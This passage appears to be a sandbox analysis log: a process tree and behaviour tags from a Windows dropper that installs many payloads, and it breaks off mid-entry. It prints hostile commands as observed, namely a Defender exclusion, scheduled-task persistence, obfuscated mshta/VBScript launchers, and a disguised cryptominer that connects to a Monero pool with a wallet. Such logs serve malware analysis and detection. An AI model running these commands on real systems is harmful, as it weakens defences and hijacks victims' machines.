PID 4164 wrote to memory of 4420	4164	cmd.exe	99
PID 4164 wrote to memory of 4420	4164	cmd.exe	99
PID 4164 wrote to memory of 4420	4164	cmd.exe	99
PID 3980 wrote to memory of 4452	3980	cmd.exe	95
PID 3980 wrote to memory of 4452	3980	cmd.exe	95
PID 3980 wrote to memory of 4452	3980	cmd.exe	95
PID 4112 wrote to memory of 4404	4112	cmd.exe	96

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2344

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2616
- C:\Windows\system32\wbem\WMIADAP.EXE
  wmiadap.exe /F /T /R
  2⤵
  PID:8004

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3064
- C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4876
- - C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4920
  - - C:\Users\Admin\AppData\Local\Temp\7zS833A2A44\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zS833A2A44\setup_install.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:5016
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        
        PID:1916
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4468
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun05ac1b0207d3ff3b8.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4164
      - C:\Users\Admin\AppData\Local\Temp\7zS833A2A44\Sun05ac1b0207d3ff3b8.exe
        
        Sun05ac1b0207d3ff3b8.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        Modifies system certificate store
        
        PID:4420
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Sun05ac1b0207d3ff3b8.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS833A2A44\Sun05ac1b0207d3ff3b8.exe" & del C:\ProgramData\*.dll & exit
        7⤵
        
        PID:6104
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Sun05ac1b0207d3ff3b8.exe /f
        8⤵
        Kills process with taskkill
        
        PID:4224
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        8⤵
        Delays execution with timeout.exe
        
        PID:6696
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun05640630a6aa.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3348
      - C:\Users\Admin\AppData\Local\Temp\7zS833A2A44\Sun05640630a6aa.exe
        
        Sun05640630a6aa.exe
        6⤵
        Executes dropped EXE
        
        PID:3560
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun05532f7abc.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3752
      - C:\Users\Admin\AppData\Local\Temp\7zS833A2A44\Sun05532f7abc.exe
        
        Sun05532f7abc.exe
        6⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:2216
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun052bbd8bebd9.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4176
      - C:\Users\Admin\AppData\Local\Temp\7zS833A2A44\Sun052bbd8bebd9.exe
        
        Sun052bbd8bebd9.exe
        6⤵
        Executes dropped EXE
        
        PID:1848
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun05d60bc3b96248e5.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3688
      - C:\Users\Admin\AppData\Local\Temp\7zS833A2A44\Sun05d60bc3b96248e5.exe
        
        Sun05d60bc3b96248e5.exe
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:740
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        7⤵
        
        PID:5432
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        8⤵
        Kills process with taskkill
        
        PID:5684
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun050462125c7d35.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4224
      - C:\Users\Admin\AppData\Local\Temp\7zS833A2A44\Sun050462125c7d35.exe
        
        Sun050462125c7d35.exe
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4236
        
        C:\ProgramData\4402665.exe
        
        "C:\ProgramData\4402665.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5084
        
        C:\ProgramData\1860007.exe
        
        "C:\ProgramData\1860007.exe"
        7⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:684
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        8⤵
        Executes dropped EXE
        
        PID:4444
        
        C:\ProgramData\133519.exe
        
        "C:\ProgramData\133519.exe"
        7⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:1456
        
        C:\ProgramData\3733924.exe
        
        "C:\ProgramData\3733924.exe"
        7⤵
        Executes dropped EXE
        
        PID:1036
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun059375dac544fc4a.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3280
      - C:\Users\Admin\AppData\Local\Temp\7zS833A2A44\Sun059375dac544fc4a.exe
        
        Sun059375dac544fc4a.exe
        6⤵
        
        PID:1788
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        7⤵
        Executes dropped EXE
        
        PID:4804
        
        C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        8⤵
        Executes dropped EXE
        
        PID:5088
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        9⤵
        
        PID:6128
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        10⤵
        Creates scheduled task(s)
        
        PID:2592
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3688
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        10⤵
        
        PID:6804
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        11⤵
        Creates scheduled task(s)
        
        PID:3348
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        10⤵
        Executes dropped EXE
        
        PID:7524
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        10⤵
        
        PID:8128
        
        C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1352
        
        C:\ProgramData\2967757.exe
        
        "C:\ProgramData\2967757.exe"
        9⤵
        Executes dropped EXE
        Suspicious behavior: SetClipboardViewer
        
        PID:3728
        
        C:\ProgramData\3307456.exe
        
        "C:\ProgramData\3307456.exe"
        9⤵
        Executes dropped EXE
        
        PID:3436
        
        C:\ProgramData\6937945.exe
        
        "C:\ProgramData\6937945.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5208
        
        C:\ProgramData\6937945.exe
        
        "C:\ProgramData\6937945.exe"
        10⤵
        Executes dropped EXE
        
        PID:5792
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5208 -s 948
        10⤵
        Program crash
        
        PID:5980
        
        C:\ProgramData\1949358.exe
        
        "C:\ProgramData\1949358.exe"
        9⤵
        Executes dropped EXE
        
        PID:5572
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\1949358.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If """"== """" for %l In ( ""C:\ProgramData\1949358.exe"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))
        10⤵
        
        PID:5780
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\1949358.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""=="" for %l In ( "C:\ProgramData\1949358.exe") do taskkill -Im "%~nxl" /F
        11⤵
        
        PID:6088
        
        C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE
        
        C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9
        12⤵
        
        PID:4728
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))
        13⤵
        
        PID:5492
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "=="" for %l In ( "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F
        14⤵
        
        PID:5512
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        15⤵
        Loads dropped DLL
        
        PID:4700
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY
        13⤵
        Loads dropped DLL
        
        PID:5228
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -Im "1949358.exe" /F
        12⤵
        Kills process with taskkill
        
        PID:5360
        
        C:\ProgramData\2880988.exe
        
        "C:\ProgramData\2880988.exe"
        9⤵
        Executes dropped EXE
        
        PID:5648
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        8⤵
        Executes dropped EXE
        
        PID:1868
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 808
        9⤵
        Program crash
        Suspicious behavior: EnumeratesProcesses
        
        PID:4512
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 836
        9⤵
        Program crash
        
        PID:2128
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 888
        9⤵
        Executes dropped EXE
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:1788
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 960
        9⤵
        Program crash
        
        PID:5356
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 936
        9⤵
        Program crash
        
        PID:5720
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 964
        9⤵
        Program crash
        
        PID:6040
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 1028
        9⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        
        PID:2748
        
        C:\Users\Admin\AppData\Local\Temp\udptest.exe
        
        "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
        8⤵
        Executes dropped EXE
        
        PID:2108
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        8⤵
        
        PID:4488
        
        C:\Users\Admin\AppData\Local\Temp\is-1I5FE.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-1I5FE.tmp\setup_2.tmp" /SL5="$10206,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2896
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
        8⤵
        Executes dropped EXE
        
        PID:5000
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
        9⤵
        Executes dropped EXE
        
        PID:4536
        
        C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4436
        
        C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
        8⤵
        Executes dropped EXE
        
        PID:4292
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3548
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 3548 -s 1996
        9⤵
        Program crash
        
        PID:2384
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun05fa3b4d2ae56e.exe /mixone
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3980
      - C:\Users\Admin\AppData\Local\Temp\7zS833A2A44\Sun05fa3b4d2ae56e.exe
        
        Sun05fa3b4d2ae56e.exe /mixone
        6⤵
        Executes dropped EXE
        
        PID:4452
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 656
        7⤵
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4888
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 672
        7⤵
        Program crash
        
        PID:3048
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 684
        7⤵
        Program crash
        
        PID:4728
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 664
        7⤵
        Program crash
        
        PID:5484
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 888
        7⤵
        Program crash
        
        PID:5300
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 952
        7⤵
        Program crash
        
        PID:5036
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 1100
        7⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        
        PID:2972
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun054fe19a12cb3.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4112
      - C:\Users\Admin\AppData\Local\Temp\7zS833A2A44\Sun054fe19a12cb3.exe
        
        Sun054fe19a12cb3.exe
        6⤵
        Executes dropped EXE
        
        PID:4404
        
        C:\Users\Admin\AppData\Local\Temp\is-9FHVS.tmp\Sun054fe19a12cb3.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-9FHVS.tmp\Sun054fe19a12cb3.tmp" /SL5="$7002E,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS833A2A44\Sun054fe19a12cb3.exe"
        7⤵
        Executes dropped EXE
        
        PID:3872
        
        C:\Users\Admin\AppData\Local\Temp\is-OE13U.tmp\46807GHF____.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-OE13U.tmp\46807GHF____.exe" /S /UID=burnerch2
        8⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        
        PID:972
        
        C:\Program Files\Windows Photo Viewer\JTSSYWMJLN\ultramediaburner.exe
        
        "C:\Program Files\Windows Photo Viewer\JTSSYWMJLN\ultramediaburner.exe" /VERYSILENT
        9⤵
        Executes dropped EXE
        
        PID:3684
        
        C:\Users\Admin\AppData\Local\Temp\is-V13IT.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-V13IT.tmp\ultramediaburner.tmp" /SL5="$B01E6,281924,62464,C:\Program Files\Windows Photo Viewer\JTSSYWMJLN\ultramediaburner.exe" /VERYSILENT
        10⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:5476
        
        C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        11⤵
        Executes dropped EXE
        
        PID:5268
        
        C:\Users\Admin\AppData\Local\Temp\b2-7d3dd-64a-999be-2f3cd1a32c459\Rulidakupy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\b2-7d3dd-64a-999be-2f3cd1a32c459\Rulidakupy.exe"
        9⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:5936
        
        C:\Users\Admin\AppData\Local\Temp\6e-391bd-dc4-01581-805d012e0e5b0\Fokifyfulo.exe
        
        "C:\Users\Admin\AppData\Local\Temp\6e-391bd-dc4-01581-805d012e0e5b0\Fokifyfulo.exe"
        9⤵
        Executes dropped EXE
        
        PID:4440
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wwmwizce.dfo\GcleanerEU.exe /eufive & exit
        10⤵
        
        PID:5948
        
        C:\Users\Admin\AppData\Local\Temp\wwmwizce.dfo\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\wwmwizce.dfo\GcleanerEU.exe /eufive
        11⤵
        Executes dropped EXE
        
        PID:6220
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ry044sms.54o\installer.exe /qn CAMPAIGN="654" & exit
        10⤵
        
        PID:6256
        
        C:\Users\Admin\AppData\Local\Temp\ry044sms.54o\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\ry044sms.54o\installer.exe /qn CAMPAIGN="654"
        11⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        Modifies system certificate store
        Suspicious use of FindShellTrayWindow
        
        PID:6444
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ry044sms.54o\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ry044sms.54o\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631171482 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        12⤵
        
        PID:6580
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zv0i5cyr.o5a\anyname.exe & exit
        10⤵
        
        PID:6520
        
        C:\Users\Admin\AppData\Local\Temp\zv0i5cyr.o5a\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\zv0i5cyr.o5a\anyname.exe
        11⤵
        Executes dropped EXE
        
        PID:6780
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lzfvjj5x.xlv\BsInstFile.exe & exit
        10⤵
        
        PID:6728
        
        C:\Users\Admin\AppData\Local\Temp\lzfvjj5x.xlv\BsInstFile.exe
        
        C:\Users\Admin\AppData\Local\Temp\lzfvjj5x.xlv\BsInstFile.exe
        11⤵
        Executes dropped EXE
        
        PID:6852
        
        C:\ProgramData\7310104.exe
        
        "C:\ProgramData\7310104.exe"
        12⤵
        
        PID:4172
        
        C:\ProgramData\5077757.exe
        
        "C:\ProgramData\5077757.exe"
        12⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: SetClipboardViewer
        
        PID:3872
        
        C:\ProgramData\8057540.exe
        
        "C:\ProgramData\8057540.exe"
        12⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:6328
        
        C:\ProgramData\3098340.exe
        
        "C:\ProgramData\3098340.exe"
        12⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:6932
        
        C:\ProgramData\4990988.exe
        
        "C:\ProgramData\4990988.exe"
        12⤵
        Executes dropped EXE
        
        PID:2128
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\4990988.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If """"== """" for %l In ( ""C:\ProgramData\4990988.exe"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))
        13⤵
        
        PID:6996
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\4990988.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""=="" for %l In ( "C:\ProgramData\4990988.exe") do taskkill -Im "%~nxl" /F
        14⤵
        
        PID:6740
        
        C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE
        
        C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9
        15⤵
        Executes dropped EXE
        
        PID:7452
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))
        16⤵
        
        PID:7620
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "=="" for %l In ( "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F
        17⤵
        
        PID:7836
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY
        16⤵
        Loads dropped DLL
        
        PID:8176
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -Im "4990988.exe" /F
        15⤵
        Kills process with taskkill
        
        PID:7584
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vyu2bb22.b1j\askinstall52.exe & exit
        10⤵
        
        PID:6960
        
        C:\Users\Admin\AppData\Local\Temp\vyu2bb22.b1j\askinstall52.exe
        
        C:\Users\Admin\AppData\Local\Temp\vyu2bb22.b1j\askinstall52.exe
        11⤵
        Executes dropped EXE
        
        PID:7112
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        12⤵
        
        PID:6680
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        13⤵
        Kills process with taskkill
        
        PID:2656
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mlocu5ln.kre\install.exe & exit
        10⤵
        
        PID:6980
        
        C:\Users\Admin\AppData\Local\Temp\mlocu5ln.kre\install.exe
        
        C:\Users\Admin\AppData\Local\Temp\mlocu5ln.kre\install.exe
        11⤵
        Executes dropped EXE
        
        PID:7040
        
        C:\Users\Admin\AppData\Local\Temp\7zSDDA4.tmp\SimplInst.exe
        
        .\SimplInst.exe
        12⤵
        Executes dropped EXE
        
        PID:6720
        
        C:\Users\Admin\AppData\Local\Temp\7zSDEAD.tmp\SimplInst.exe
        
        .\SimplInst.exe /S /site_id "216660"
        13⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Drops file in System32 directory
        Enumerates system info in registry
        
        PID:7216
        
        C:\Windows\SysWOW64\cmd.exe
        
